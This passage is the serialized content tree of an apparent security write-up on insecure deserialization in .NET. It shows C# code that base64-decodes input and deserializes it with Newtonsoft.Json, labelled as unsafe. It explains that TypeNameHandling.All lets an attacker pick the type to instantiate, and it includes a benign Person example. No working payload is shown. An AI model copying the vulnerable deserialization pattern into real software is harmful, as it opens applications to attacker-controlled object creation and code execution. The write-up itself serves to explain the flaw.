return",{"type":32,"tag":89,"props":2468,"children":2469},{"style":159},[2470],{"type":37,"value":2427},{"type":32,"tag":89,"props":2472,"children":2473},{"style":124},[2474],{"type":37,"value":1866},{"type":32,"tag":89,"props":2476,"children":2477},{"class":91,"line":640},[2478],{"type":32,"tag":89,"props":2479,"children":2480},{"style":124},[2481],{"type":37,"value":1276},{"type":32,"tag":89,"props":2483,"children":2484},{"class":91,"line":699},[2485],{"type":32,"tag":89,"props":2486,"children":2487},{"emptyLinePlaceholder":275},[2488],{"type":37,"value":278},{"type":32,"tag":89,"props":2490,"children":2491},{"class":91,"line":752},[2492,2496,2500,2504,2508,2512,2516,2521,2525,2529,2534,2539],{"type":32,"tag":89,"props":2493,"children":2494},{"style":106},[2495],{"type":37,"value":2264},{"type":32,"tag":89,"props":2497,"children":2498},{"style":106},[2499],{"type":37,"value":2269},{"type":32,"tag":89,"props":2501,"children":2502},{"style":112},[2503],{"type":37,"value":1390},{"type":32,"tag":89,"props":2505,"children":2506},{"style":124},[2507],{"type":37,"value":853},{"type":32,"tag":89,"props":2509,"children":2510},{"style":112},[2511],{"type":37,"value":858},{"type":32,"tag":89,"props":2513,"children":2514},{"style":124},[2515],{"type":37,"value":863},{"type":32,"tag":89,"props":2517,"children":2518},{"style":118},[2519],{"type":37,"value":2520}," Deserialize",{"type":32,"tag":89,"props":2522,"children":2523},{"style":124},[2524],{"type":37,"value":357},{"type":32,"tag":89,"props":2526,"children":2527},{"style":143},[2528],{"type":37,"value":362},{"type":32,"tag":89,"props":2530,"children":2531},{"style":118},[2532],{"type":37,"value":2533}," str",{"type":32,"tag":89,"props":2535,"children":2536},{"style":124},[2537],{"type":37,"value":2538},")",{"type":32,"tag":89,"props":2540,"children":2541},{"style":295},[2542],{"type":37,"value":2543}," \n",{"type":32,"tag":89,"props":2545,"children":2546},{"class":91,"line":761},[2547],{"type":32,"tag":89,"props":2548,"children":2549},{"style":124},[2550],{"type":37,"value":839},{"type":32,"tag":89,"props":2552,"children":2553},{"class":91,"line":833},[2554,2558,2563,2567,2571,2575,2580,2584,2589],{"type":32,"tag":89,"props":2555,"children":2556},{"style":143},[2557],{"type":37,"value":1124},{"type":32,"tag":89,"props":2559,"children":2560},{"style":118},[2561],{"type":37,"value":2562}," decodedData",{"type":32,"tag":89,"props":2564,"children":2565},{"style":124},[2566],{"type":37,"value":156},{"type":32,"tag":89,"props":2568,"children":2569},{"style":159},[2570],{"type":37,"value":2436},{"type":32,"tag":89,"props":2572,"children":2573},{"style":124},[2574],{"type":37,"value":167},{"type":32,"tag":89,"props":2576,"children":2577},{"style":118},[2578],{"type":37,"value":2579},"Decode",{"type":32,"tag":89,"props":2581,"children":2582},{"style":124},[2583],{"type":37,"value":357},{"type":32,"tag":89,"props":2585,"children":2586},{"style":159},[2587],{"type":37,"value":2588},"str",{"type":32,"tag":89,"props":2590,"children":2591},{"style":124},[2592],{"type":37,"value":907},{"type":32,"tag":89,"props":2594,"children":2595},{"class":91,"line":842},[2596],{"type":32,"tag":89,"props":2597,"children":2598},{"style":295},[2599],{"type":37,"value":2600}," \n",{"type":32,"tag":89,"props":2602,"children":2603},{"class":91,"line":910},[2604],{"type":32,"tag":89,"props":2605,"children":2606},{"style":96},[2607],{"type":37,"value":2608}," // unsafe deserialization\n",{"type":32,"tag":89,"props":2610,"children":2611},{"class":91,"line":989},[2612,2617,2622,2626,2630,2634,2639,2643,2648,2652,2656],{"type":32,"tag":89,"props":2613,"children":2614},{"style":106},[2615],{"type":37,"value":2616}," var",{"type":32,"tag":89,"props":2618,"children":2619},{"style":118},[2620],{"type":37,"value":2621}," deserialized",{"type":32,"tag":89,"props":2623,"children":2624},{"style":124},[2625],{"type":37,"value":156},{"type":32,"tag":89,"props":2627,"children":2628},{"style":159},[2629],{"type":37,"value":2336},{"type":32,"tag":89,"props":2631,"children":2632},{"style":124},[2633],{"type":37,"value":167},{"type":32,"tag":89,"props":2635,"children":2636},{"style":118},[2637],{"type":37,"value":2638},"DeserializeObject",{"type":32,"tag":89,"props":2640,"children":2641},{"style":124},[2642],{"type":37,"value":357},{"type":32,"tag":89,"props":2644,"children":2645},{"style":159},[2646],{"type":37,"value":2647},"decodedData",{"type":32,"tag":89,"props":2649,"children":2650},{"style":124},[2651],{"type":37,"value":372},{"type":32,"tag":89,"props":2653,"children":2654},{"style":106},[2655],{"type":37,"value":1385},{"type":32,"tag":89,"props":2657,"children":2658},{"style":112},[2659],{"type":37,"value":2367},{"type":32,"tag":89,"props":2661,"children":2662},{"class":91,"line":997},[2663],{"type":32,"tag":89,"props":2664,"children":2665},{"style":124},[2666],{"type":37,"value":1033},{"type":32,"tag":89,"props":2668,"children":2669},{"class":91,"line":1027},[2670,2674,2678,2682,2686],{"type":32,"tag":89,"props":2671,"children":2672},{"style":159},[2673],{"type":37,"value":2382},{"type":32,"tag":89,"props":2675,"children":2676},{"style":124},[2677],{"type":37,"value":156},{"type":32,"tag":89,"props":2679,"children":2680},{"style":159},[2681],{"type":37,"value":2391},{"type":32,"tag":89,"props":2683,"children":2684},{"style":124},[2685],{"type":37,"value":167},{"type":32,"tag":89,"props":2687,"children":2688},{"style":159},[2689],{"type":37,"value":2400},{"type":32,"tag":89,"props":2691,"children":2692},{"class":91,"line":1036},[2693],{"type":32,"tag":89,"props":2694,"children":2695},{"style":124},[2696],{"type":37,"value":2408},{"type":32,"tag":89,"props":2698,"children":2699},{"class":91,"line":1071},[2700],{"type":32,"tag":89,"props":2701,"children":2702},{"emptyLinePlaceholder":275},[2703],{"type":37,"value":278},{"type":32,"tag":89,"props":2705,"children":2706},{"class":91,"line":1080},[2707,2711,2715,2719,2723,2727,2731,2735,2740,2744,2748,2752],{"type":32,"tag":89,"props":2708,"children":2709},{"style":112},[2710],{"type":37,"value":848},{"type":32,"tag":89,"props":2712,"children":2713},{"style":124},[2714],{"type":37,"value":853},{"type":32,"tag":89,"props":2716,"children":2717},{"style":112},[2718],{"type":37,"value":858},{"type":32,"tag":89,"props":2720,"children":2721},{"style":124},[2722],{"type":37,"value":863},{"type":32,"tag":89,"props":2724,"children":2725},{"style":118},[2726],{"type":37,"value":868},{"type":32,"tag":89,"props":2728,"children":2729},{"style":124},[2730],{"type":37,"value":156},{"type":32,"tag":89,"props":2732,"children":2733},{"style":159},[2734],{"type":37,"value":2621},{"type":32,"tag":89,"props":2736,"children":2737},{"style":106},[2738],{"type":37,"value":2739}," as",{"type":32,"tag":89,"props":2741,"children":2742},{"style":112},[2743],{"type":37,"value":1390},{"type":32,"tag":89,"props":2745,"children":2746},{"style":124},[2747],{"type":37,"value":853},{"type":32,"tag":89,"props":2749,"children":2750},{"style":112},[2751],{"type":37,"value":858},{"type":32,"tag":89,"props":2753,"children":2754},{"style":124},[2755],{"type":37,"value":2756},">;\n",{"type":32,"tag":89,"props":2758,"children":2759},{"class":91,"line":1088},[2760],{"type":32,"tag":89,"props":2761,"children":2762},{"emptyLinePlaceholder":275},[2763],{"type":37,"value":278},{"type":32,"tag":89,"props":2765,"children":2766},{"class":91,"line":1118},[2767,2771,2775],{"type":32,"tag":89,"props":2768,"children":2769},{"style":143},[2770],{"type":37,"value":2466},{"type":32,"tag":89,"props":2772,"children":2773},{"style":159},[2774],{"type":37,"value":868},{"type":32,"tag":89,"props":2776,"children":2777},{"style":124},[2778],{"type":37,"value":1866},{"type":32,"tag":89,"props":2780,"children":2781},{"class":91,"line":1162},[2782],{"type":32,"tag":89,"props":2783,"children":2784},{"style":124},[2785],{"type":37,"value":1276},{"type":32,"tag":89,"props":2787,"children":2788},{"class":91,"line":1230},[2789],{"type":32,"tag":89,"props":2790,"children":2791},{"style":124},[2792],{"type":37,"value":1648},{"type":32,"tag":89,"props":2794,"children":2795},{"class":91,"line":1270},[2796],{"type":32,"tag":89,"props":2797,"children":2798},{"style":124},[2799],{"type":37,"value":311},{"type":32,"tag":46,"props":2801,"children":2802},{},[2803],{"type":32,"tag":2804,"props":2805,"children":2806},"strong",{},[2807],{"type":37,"value":2808},"It is also important to note that the class responsible for deserializing the objects also encodes and decodes them in base64.",{"type":32,"tag":2810,"props":2811,"children":2813},"h3",{"id":2812},"what-is-a-serialization",[2814],{"type":37,"value":2815},"What is a serialization?",{"type":32,"tag":46,"props":2817,"children":2818},{},[2819],{"type":37,"value":2820},"Serialization and deserialization are essential processes in computer science that involve converting data into a format that can be easily stored, transmitted, or reconstructed.",{"type":32,"tag":46,"props":2822,"children":2823},{},[2824],{"type":37,"value":2825},"It refers to the process of converting an object or data structure into a format (often a byte stream) that can be easily stored in memory. During serialization, complex data structures or objects are converted into a linear stream of bytes that can be easily reconstructed back into the original format when needed.",{"type":32,"tag":46,"props":2827,"children":2828},{},[2829],{"type":37,"value":2830},"The vulnerability known as the \"deserialization vulnerability\" in C# and other programming languages arises due to the mishandling or inadequate validation of serialized data, leading to potential security risks.",{"type":32,"tag":46,"props":2832,"children":2833},{},[2834],{"type":37,"value":2835},"When data is deserialized, it is converted from its serialized form (often binary or text) back into an object or data structure. If this process is not properly secured, malicious actors may exploit it by inserting crafted or malicious input during deserialization, leading to various security issues.",{"type":32,"tag":46,"props":2837,"children":2838},{},[2839],{"type":37,"value":2840},"Suppose our objective involves a .NET program/website as the target, capable of accepting data in JSON format through a network, maybe via an HTTP header on a website. Upon reaching the server, the data undergoes conversion (deserialization) from JSON text into an instance of the Person class, usable by the .NET code.",{"type":32,"tag":46,"props":2842,"children":2843},{},[2844],{"type":37,"value":2845},"If the configuration of the conversion process is inadequate, we can specify a different .NET class for the data to be transformed into, rather than automatically reverting it back into the Person class.",{"type":32,"tag":46,"props":2847,"children":2848},{},[2849],{"type":37,"value":2850},"Here is a quick example with a simple Person class.",{"type":32,"tag":46,"props":2852,"children":2853},{},[2854],{"type":37,"value":2855},"In the code below, we have a class that we serialize and deserialize:",{"type":32,"tag":74,"props":2857,"children":2858},{"lang":76},[2859],{"type":32,"tag":79,"props":2860,"children":2862},{"code":2861,"language":76,"meta":7,"className":82,"style":7},"using System;\nusing Newtonsoft.Json;\nusing System.Collections.Generic;\n\n class Person\n {\n public string Name { get; set; }\n public int Age { get; set; }\n }\n\n\npublic class Program\n{\n public static void Main()\n {\n Person person = new Person { Name = \"John\", Age = 30 };\n \n string json = JsonConvert.SerializeObject(person);\n Console.WriteLine(\"Serialized Person:\");\n Console.WriteLine(json);\n Person deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json);\n Console.WriteLine(\"\\nDeserialized Person:\");\n Console.WriteLine(\"Name:\" + deserializedPerson.Name + \" Age:\" + deserializedPerson.Age);\n }\n}\n",[2863],{"type":32,"tag":85,"props":2864,"children":2865},{"__ignoreMap":7},[2866,2882,2905,2938,2945,2957,2965,3010,3051,3058,3065,3072,3088,3095,3120,3127,3202,3210,3252,3290,3318,3368,3410,3498,3505],{"type":32,"tag":89,"props":2867,"children":2868},{"class":91,"line":92},[2869,2873,2878],{"type":32,"tag":89,"props":2870,"children":2871},{"style":143},[2872],{"type":37,"value":2153},{"type":32,"tag":89,"props":2874,"children":2875},{"style":112},[2876],{"type":37,"value":2877}," System",{"type":32,"tag":89,"props":2879,"children":2880},{"style":124},[2881],{"type":37,"value":1866},{"type":32,"tag":89,"props":2883,"children":2884},{"class":91,"line":102},[2885,2889,2893,2897,2901],{"type":32,"tag":89,"props":2886,"children":2887},{"style":143},[2888],{"type":37,"value":2153},{"type":32,"tag":89,"props":2890,"children":2891},{"style":112},[2892],{"type":37,"value":2158},{"type":32,"tag":89,"props":2894,"children":2895},{"style":124},[2896],{"type":37,"value":167},{"type":32,"tag":89,"props":2898,"children":2899},{"style":112},[2900],{"type":37,"value":2167},{"type":32,"tag":89,"props":2902,"children":2903},{"style":124},[2904],{"type":37,"value":1866},{"type":32,"tag":89,"props":2906,"children":2907},{"class":91,"line":130},[2908,2912,2916,2920,2925,2929,2934],{"type":32,"tag":89,"props":2909,"children":2910},{"style":143},[2911],{"type":37,"value":2153},{"type":32,"tag":89,"props":2913,"children":2914},{"style":112},[2915],{"type":37,"value":2877},{"type":32,"tag":89,"props":2917,"children":2918},{"style":124},[2919],{"type":37,"value":167},{"type":32,"tag":89,"props":2921,"children":2922},{"style":112},[2923],{"type":37,"value":2924},"Collections",{"type":32,"tag":89,"props":2926,"children":2927},{"style":124},[2928],{"type":37,"value":167},{"type":32,"tag":89,"props":2930,"children":2931},{"style":112},[2932],{"type":37,"value":2933},"Generic",{"type":32,"tag":89,"props":2935,"children":2936},{"style":124},[2937],{"type":37,"value":1866},{"type":32,"tag":89,"props":2939,"children":2940},{"class":91,"line":139},[2941],{"type":32,"tag":89,"props":2942,"children":2943},{"emptyLinePlaceholder":275},[2944],{"type":37,"value":278},{"type":32,"tag":89,"props":2946,"children":2947},{"class":91,"line":211},[2948,2952],{"type":32,"tag":89,"props":2949,"children":2950},{"style":106},[2951],{"type":37,"value":2244},{"type":32,"tag":89,"props":2953,"children":2954},{"style":112},[2955],{"type":37,"value":2956}," Person\n",{"type":32,"tag":89,"props":2958,"children":2959},{"class":91,"line":271},[2960],{"type":32,"tag":89,"props":2961,"children":2962},{"style":124},[2963],{"type":37,"value":2964}," {\n",{"type":32,"tag":89,"props":2966,"children":2967},{"class":91,"line":281},[2968,2973,2977,2982,2987,2992,2996,3001,3005],{"type":32,"tag":89,"props":2969,"children":2970},{"style":106},[2971],{"type":37,"value":2972}," public",{"type":32,"tag":89,"props":2974,"children":2975},{"style":143},[2976],{"type":37,"value":377},{"type":32,"tag":89,"props":2978,"children":2979},{"style":118},[2980],{"type":37,"value":2981}," Name",{"type":32,"tag":89,"props":2983,"children":2984},{"style":124},[2985],{"type":37,"value":2986}," {",{"type":32,"tag":89,"props":2988,"children":2989},{"style":106},[2990],{"type":37,"value":2991}," get",{"type":32,"tag":89,"props":2993,"children":2994},{"style":124},[2995],{"type":37,"value":263},{"type":32,"tag":89,"props":2997,"children":2998},{"style":106},[2999],{"type":37,"value":3000}," set",{"type":32,"tag":89,"props":3002,"children":3003},{"style":124},[3004],{"type":37,"value":263},{"type":32,"tag":89,"props":3006,"children":3007},{"style":124},[3008],{"type":37,"value":3009}," }\n",{"type":32,"tag":89,"props":3011,"children":3012},{"class":91,"line":305},[3013,3017,3022,3027,3031,3035,3039,3043,3047],{"type":32,"tag":89,"props":3014,"children":3015},{"style":106},[3016],{"type":37,"value":2972},{"type":32,"tag":89,"props":3018,"children":3019},{"style":143},[3020],{"type":37,"value":3021}," int",{"type":32,"tag":89,"props":3023,"children":3024},{"style":118},[3025],{"type":37,"value":3026}," Age",{"type":32,"tag":89,"props":3028,"children":3029},{"style":124},[3030],{"type":37,"value":2986},{"type":32,"tag":89,"props":3032,"children":3033},{"style":106},[3034],{"type":37,"value":2991},{"type":32,"tag":89,"props":3036,"children":3037},{"style":124},[3038],{"type":37,"value":263},{"type":32,"tag":89,"props":3040,"children":3041},{"style":106},[3042],{"type":37,"value":3000},{"type":32,"tag":89,"props":3044,"children":3045},{"style":124},[3046],{"type":37,"value":263},{"type":32,"tag":89,"props":3048,"children":3049},{"style":124},[3050],{"type":37,"value":3009},{"type":32,"tag":89,"props":3052,"children":3053},{"class":91,"line":314},[3054],{"type":32,"tag":89,"props":3055,"children":3056},{"style":124},[3057],{"type":37,"value":3009},{"type":32,"tag":89,"props":3059,"children":3060},{"class":91,"line":331},[3061],{"type":32,"tag":89,"props":3062,"children":3063},{"emptyLinePlaceholder":275},[3064],{"type":37,"value":278},{"type":32,"tag":89,"props":3066,"children":3067},{"class":91,"line":339},[3068],{"type":32,"tag":89,"props":3069,"children":3070},{"emptyLinePlaceholder":275},[3071],{"type":37,"value":278},{"type":32,"tag":89,"props":3073,"children":3074},{"class":91,"line":390},[3075,3079,3083],{"type":32,"tag":89,"props":3076,"children":3077},{"style":106},[3078],{"type":37,"value":109},{"type":32,"tag":89,"props":3080,"children":3081},{"style":106},[3082],{"type":37,"value":2244},{"type":32,"tag":89,"props":3084,"children":3085},{"style":112},[3086],{"type":37,"value":3087}," Program\n",{"type":32,"tag":89,"props":3089,"children":3090},{"class":91,"line":398},[3091],{"type":32,"tag":89,"props":3092,"children":3093},{"style":124},[3094],{"type":37,"value":136},{"type":32,"tag":89,"props":3096,"children":3097},{"class":91,"line":454},[3098,3102,3106,3111,3116],{"type":32,"tag":89,"props":3099,"children":3100},{"style":106},[3101],{"type":37,"value":2239},{"type":32,"tag":89,"props":3103,"children":3104},{"style":106},[3105],{"type":37,"value":2269},{"type":32,"tag":89,"props":3107,"children":3108},{"style":143},[3109],{"type":37,"value":3110}," void",{"type":32,"tag":89,"props":3112,"children":3113},{"style":118},[3114],{"type":37,"value":3115}," Main",{"type":32,"tag":89,"props":3117,"children":3118},{"style":124},[3119],{"type":37,"value":127},{"type":32,"tag":89,"props":3121,"children":3122},{"class":91,"line":503},[3123],{"type":32,"tag":89,"props":3124,"children":3125},{"style":124},[3126],{"type":37,"value":758},{"type":32,"tag":89,"props":3128,"children":3129},{"class":91,"line":567},[3130,3135,3140,3144,3148,3153,3157,3161,3165,3170,3175,3179,3183,3187,3191,3197],{"type":32,"tag":89,"props":3131,"children":3132},{"style":112},[3133],{"type":37,"value":3134}," Person",{"type":32,"tag":89,"props":3136,"children":3137},{"style":118},[3138],{"type":37,"value":3139}," person",{"type":32,"tag":89,"props":3141,"children":3142},{"style":124},[3143],{"type":37,"value":156},{"type":32,"tag":89,"props":3145,"children":3146},{"style":106},[3147],{"type":37,"value":1385},{"type":32,"tag":89,"props":3149,"children":3150},{"style":112},[3151],{"type":37,"value":3152}," Person",{"type":32,"tag":89,"props":3154,"children":3155},{"style":124},[3156],{"type":37,"value":2986},{"type":32,"tag":89,"props":3158,"children":3159},{"style":159},[3160],{"type":37,"value":2981},{"type":32,"tag":89,"props":3162,"children":3163},{"style":124},[3164],{"type":37,"value":156},{"type":32,"tag":89,"props":3166,"children":3167},{"style":180},[3168],{"type":37,"value":3169}," \"",{"type":32,"tag":89,"props":3171,"children":3172},{"style":186},[3173],{"type":37,"value":3174},"John",{"type":32,"tag":89,"props":3176,"children":3177},{"style":180},[3178],{"type":37,"value":183},{"type":32,"tag":89,"props":3180,"children":3181},{"style":124},[3182],{"type":37,"value":372},{"type":32,"tag":89,"props":3184,"children":3185},{"style":159},[3186],{"type":37,"value":3026},{"type":32,"tag":89,"props":3188,"children":3189},{"style":124},[3190],{"type":37,"value":156},{"type":32,"tag":89,"props":3192,"children":3194},{"style":3193},"--shiki-default:#4C9A91",[3195],{"type":37,"value":3196}," 30",{"type":32,"tag":89,"props":3198,"children":3199},{"style":124},[3200],{"type":37,"value":3201}," };\n",{"type":32,"tag":89,"props":3203,"children":3204},{"class":91,"line":640},[3205],{"type":32,"tag":89,"props":3206,"children":3207},{"style":295},[3208],{"type":37,"value":3209}," \n",{"type":32,"tag":89,"props":3211,"children":3212},{"class":91,"line":699},[3213,3218,3223,3227,3231,3235,3239,3243,3248],{"type":32,"tag":89,"props":3214,"children":3215},{"style":143},[3216],{"type":37,"value":3217}," string",{"type":32,"tag":89,"props":3219,"children":3220},{"style":118},[3221],{"type":37,"value":3222}," json",{"type":32,"tag":89,"props":3224,"children":3225},{"style":124},[3226],{"type":37,"value":156},{"type":32,"tag":89,"props":3228,"children":3229},{"style":159},[3230],{"type":37,"value":2336},{"type":32,"tag":89,"props":3232,"children":3233},{"style":124},[3234],{"type":37,"value":167},{"type":32,"tag":89,"props":3236,"children":3237},{"style":118},[3238],{"type":37,"value":2345},{"type":32,"tag":89,"props":3240,"children":3241},{"style":124},[3242],{"type":37,"value":357},{"type":32,"tag":89,"props":3244,"children":3245},{"style":159},[3246],{"type":37,"value":3247},"person",{"type":32,"tag":89,"props":3249,"children":3250},{"style":124},[3251],{"type":37,"value":907},{"type":32,"tag":89,"props":3253,"children":3254},{"class":91,"line":752},[3255,3260,3264,3269,3273,3277,3282,3286],{"type":32,"tag":89,"props":3256,"children":3257},{"style":159},[3258],{"type":37,"value":3259}," Console",{"type":32,"tag":89,"props":3261,"children":3262},{"style":124},[3263],{"type":37,"value":167},{"type":32,"tag":89,"props":3265,"children":3266},{"style":118},[3267],{"type":37,"value":3268},"WriteLine",{"type":32,"tag":89,"props":3270,"children":3271},{"style":124},[3272],{"type":37,"value":357},{"type":32,"tag":89,"props":3274,"children":3275},{"style":180},[3276],{"type":37,"value":183},{"type":32,"tag":89,"props":3278,"children":3279},{"style":186},[3280],{"type":37,"value":3281},"Serialized Person:",{"type":32,"tag":89,"props":3283,"children":3284},{"style":180},[3285],{"type":37,"value":183},{"type":32,"tag":89,"props":3287,"children":3288},{"style":124},[3289],{"type":37,"value":907},{"type":32,"tag":89,"props":3291,"children":3292},{"class":91,"line":761},[3293,3297,3301,3305,3309,3314],{"type":32,"tag":89,"props":3294,"children":3295},{"style":159},[3296],{"type":37,"value":3259},{"type":32,"tag":89,"props":3298,"children":3299},{"style":124},[3300],{"type":37,"value":167},{"type":32,"tag":89,"props":3302,"children":3303},{"style":118},[3304],{"type":37,"value":3268},{"type":32,"tag":89,"props":3306,"children":3307},{"style":124},[3308],{"type":37,"value":357},{"type":32,"tag":89,"props":3310,"children":3311},{"style":159},[3312],{"type":37,"value":3313},"json",{"type":32,"tag":89,"props":3315,"children":3316},{"style":124},[3317],{"type":37,"value":907},{"type":32,"tag":89,"props":3319,"children":3320},{"class":91,"line":833},[3321,3325,3330,3334,3338,3342,3346,3350,3355,3360,3364],{"type":32,"tag":89,"props":3322,"children":3323},{"style":112},[3324],{"type":37,"value":3134},{"type":32,"tag":89,"props":3326,"children":3327},{"style":118},[3328],{"type":37,"value":3329}," deserializedPerson",{"type":32,"tag":89,"props":3331,"children":3332},{"style":124},[3333],{"type":37,"value":156},{"type":32,"tag":89,"props":3335,"children":3336},{"style":159},[3337],{"type":37,"value":2336},{"type":32,"tag":89,"props":3339,"children":3340},{"style":124},[3341],{"type":37,"value":167},{"type":32,"tag":89,"props":3343,"children":3344},{"style":118},[3345],{"type":37,"value":2638},{"type":32,"tag":89,"props":3347,"children":3348},{"style":124},[3349],{"type":37,"value":853},{"type":32,"tag":89,"props":3351,"children":3352},{"style":112},[3353],{"type":37,"value":3354},"Person",{"type":32,"tag":89,"props":3356,"children":3357},{"style":124},[3358],{"type":37,"value":3359},">(",{"type":32,"tag":89,"props":3361,"children":3362},{"style":159},[3363],{"type":37,"value":3313},{"type":32,"tag":89,"props":3365,"children":3366},{"style":124},[3367],{"type":37,"value":907},{"type":32,"tag":89,"props":3369,"children":3370},{"class":91,"line":842},[3371,3375,3379,3383,3387,3391,3397,3402,3406],{"type":32,"tag":89,"props":3372,"children":3373},{"style":159},[3374],{"type":37,"value":3259},{"type":32,"tag":89,"props":3376,"children":3377},{"style":124},[3378],{"type":37,"value":167},{"type":32,"tag":89,"props":3380,"children":3381},{"style":118},[3382],{"type":37,"value":3268},{"type":32,"tag":89,"props":3384,"children":3385},{"style":124},[3386],{"type":37,"value":357},{"type":32,"tag":89,"props":3388,"children":3389},{"style":180},[3390],{"type":37,"value":183},{"type":32,"tag":89,"props":3392,"children":3394},{"style":3393},"--shiki-default:#C99076",[3395],{"type":37,"value":3396},"\\n",{"type":32,"tag":89,"props":3398,"children":3399},{"style":186},[3400],{"type":37,"value":3401},"Deserialized Person:",{"type":32,"tag":89,"props":3403,"children":3404},{"style":180},[3405],{"type":37,"value":183},{"type":32,"tag":89,"props":3407,"children":3408},{"style":124},[3409],{"type":37,"value":907},{"type":32,"tag":89,"props":3411,"children":3412},{"class":91,"line":910},[3413,3417,3421,3425,3429,3433,3438,3442,3447,3451,3455,3460,3464,3468,3473,3477,3481,3485,3489,3494],{"type":32,"tag":89,"props":3414,"children":3415},{"style":159},[3416],{"type":37,"value":3259},{"type":32,"tag":89,"props":3418,"children":3419},{"style":124},[3420],{"type":37,"value":167},{"type":32,"tag":89,"props":3422,"children":3423},{"style":118},[3424],{"type":37,"value":3268},{"type":32,"tag":89,"props":3426,"children":3427},{"style":124},[3428],{"type":37,"value":357},{"type":32,"tag":89,"props":3430,"children":3431},{"style":180},[3432],{"type":37,"value":183},{"type":32,"tag":89,"props":3434,"children":3435},{"style":186},[3436],{"type":37,"value":3437},"Name:",{"type":32,"tag":89,"props":3439,"children":3440},{"style":180},[3441],{"type":37,"value":183},{"type":32,"tag":89,"props":3443,"children":3444},{"style":106},[3445],{"type":37,"value":3446}," +",{"type":32,"tag":89,"props":3448,"children":3449},{"style":159},[3450],{"type":37,"value":3329},{"type":32,"tag":89,"props":3452,"children":3453},{"style":124},[3454],{"type":37,"value":167},{"type":32,"tag":89,"props":3456,"children":3457},{"style":159},[3458],{"type":37,"value":3459},"Name",{"type":32,"tag":89,"props":3461,"children":3462},{"style":106},[3463],{"type":37,"value":3446},{"type":32,"tag":89,"props":3465,"children":3466},{"style":180},[3467],{"type":37,"value":3169},{"type":32,"tag":89,"props":3469,"children":3470},{"style":186},[3471],{"type":37,"value":3472}," Age:",{"type":32,"tag":89,"props":3474,"children":3475},{"style":180},[3476],{"type":37,"value":183},{"type":32,"tag":89,"props":3478,"children":3479},{"style":106},[3480],{"type":37,"value":3446},{"type":32,"tag":89,"props":3482,"children":3483},{"style":159},[3484],{"type":37,"value":3329},{"type":32,"tag":89,"props":3486,"children":3487},{"style":124},[3488],{"type":37,"value":167},{"type":32,"tag":89,"props":3490,"children":3491},{"style":159},[3492],{"type":37,"value":3493},"Age",{"type":32,"tag":89,"props":3495,"children":3496},{"style":124},[3497],{"type":37,"value":907},{"type":32,"tag":89,"props":3499,"children":3500},{"class":91,"line":989},[3501],{"type":32,"tag":89,"props":3502,"children":3503},{"style":124},[3504],{"type":37,"value":1648},{"type":32,"tag":89,"props":3506,"children":3507},{"class":91,"line":997},[3508],{"type":32,"tag":89,"props":3509,"children":3510},{"style":124},[3511],{"type":37,"value":311},{"type":32,"tag":46,"props":3513,"children":3514},{},[3515],{"type":37,"value":3516},"The output of this code is as follows:",{"type":32,"tag":74,"props":3518,"children":3520},{"lang":3519},"txt",[3521],{"type":32,"tag":79,"props":3522,"children":3524},{"code":3523},"Serialized Person:\n{\"Name\":\"John\",\"Age\":30}\n\nDeserialized Person:\nName:John Age:30\n",[3525],{"type":32,"tag":85,"props":3526,"children":3527},{"__ignoreMap":7},[3528],{"type":37,"value":3523},{"type":32,"tag":2810,"props":3530,"children":3532},{"id":3531},"so-what-is-the-problem",[3533],{"type":37,"value":3534},"So what is the problem?",{"type":32,"tag":46,"props":3536,"children":3537},{},[3538],{"type":37,"value":3539},"In our case, we have properly protected the deserialization, our data contains a simple JSON string representing a Person object.",{"type":32,"tag":46,"props":3541,"children":3542},{},[3543,3545,3551],{"type":37,"value":3544},"The unsafe use of deserialization occurs when the ",{"type":32,"tag":85,"props":3546,"children":3548},{"className":3547},[],[3549],{"type":37,"value":3550},"TypeNameHandling.All",{"type":37,"value":3552}," option is passed as the second parameter of deserialization. This option allows us to deserialize an object of our choice, and we can also set the values of the attributes of this object.",{"type":32,"tag":74,"props":3554,"children":3555},{"lang":76},[3556],{"type":32,"tag":79,"props":3557,"children":3559},{"code":3558,"language":76,"meta":7,"className":82,"style":7},"// With safe deserialization\nPerson deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json);\n\n// Without safe deserialization\nPerson deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json, new JsonSerializerSettings {\n TypeNameHandling = TypeNameHandling.All\n});\n",[3560],{"type":32,"tag":85,"props":3561,"children":3562},{"__ignoreMap":7},[3563,3571,3618,3625,3633,3693,3716],{"type":32,"tag":89,"props":3564,"children":3565},{"class":91,"line":92},[3566],{"type":32,"tag":89,"props":3567,"children":3568},{"style":96},[3569],{"type":37,"value":3570},"// With safe deserialization\n",{"type":32,"tag":89,"props":3572,"children":3573},{"class":91,"line":102},[3574,3578,3582,3586,3590,3594,3598,3602,3606,3610,3614],{"type":32,"tag":89,"props":3575,"children":3576},{"style":112},[3577],{"type":37,"value":3354},{"type":32,"tag":89,"props":3579,"children":3580},{"style":118},[3581],{"type":37,"value":3329},{"type":32,"tag":89,"props":3583,"children":3584},{"style":124},[3585],{"type":37,"value":156},{"type":32,"tag":89,"props":3587,"children":3588},{"style":159},[3589],{"type":37,"value":2336},{"type":32,"tag":89,"props":3591,"children":3592},{"style":124},[3593],{"type":37,"value":167},{"type":32,"tag":89,"props":3595,"children":3596},{"style":118},[3597],{"type":37,"value":2638},{"type":32,"tag":89,"props":3599,"children":3600},{"style":124},[3601],{"type":37,"value":853},{"type":32,"tag":89,"props":3603,"children":3604},{"style":112},[3605],{"type":37,"value":3354},{"type":32,"tag":89,"props":3607,"children":3608},{"style":124},[3609],{"type":37,"value":3359},{"type":32,"tag":89,"props":3611,"children":3612},{"style":159},[3613],{"type":37,"value":3313},{"type":32,"tag":89,"props":3615,"children":3616},{"style":124},[3617],{"type":37,"value":907},{"type":32,"tag":89,"props":3619,"children":3620},{"class":91,"line":130},[3621],{"type":32,"tag":89,"props":3622,"children":3623},{"emptyLinePlaceholder":275},[3624],{"type":37,"value":278},{"type":32,"tag":89,"props":3626,"children":3627},{"class":91,"line":139},[3628],{"type":32,"tag":89,"props":3629,"children":3630},{"style":96},[3631],{"type":37,"value":3632},"// Without safe 